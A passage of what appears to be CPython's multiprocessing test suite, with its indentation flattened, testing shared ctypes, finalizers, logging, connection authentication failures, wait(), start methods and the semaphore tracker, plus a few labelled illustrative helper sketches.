random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
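# Illustrative sketch, not part of the test suite: the public
# weakref.finalize API (already used by the Bunch helper above) covers
# the simple 'a' case from _test_finalize.  In CPython, refcounting fires
# the callback as soon as the last reference goes away.
def _demo_weakref_finalize():
    sent = []
    class Foo(object):
        pass
    a = Foo()
    weakref.finalize(a, sent.append, 'a')
    del a                                   # triggers the callback
    assert sent == ['a']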
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
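# Illustrative sketch, not part of the test suite: log_to_stderr() is the
# public helper that pairs with get_logger(); it attaches a stderr
# handler so level changes become visible.  It is avoided in the tests
# above to keep their output quiet.
def _demo_mp_logging():
    logger = multiprocessing.log_to_stderr()
    logger.setLevel(logging.INFO)
    logger.info('visible once the level is INFO or lower')
    logger.setLevel(logging.NOTSET)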
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
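# Illustrative sketch of the underlying scheme, an assumption rather than
# a copy of multiprocessing's wire protocol: deliver_challenge() and
# answer_challenge() implement an HMAC challenge-response handshake.
def _demo_challenge_response(authkey=b'secret'):
    import hmac
    challenge = os.urandom(20)              # server -> client
    digest = hmac.new(authkey, challenge, 'md5').digest()  # client -> server
    # server recomputes the digest and compares in constant time
    assert hmac.compare_digest(
        digest, hmac.new(authkey, challenge, 'md5').digest())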
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test spawning processes from within processes
# Verifies os.close(sys.stdin.fileno()) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
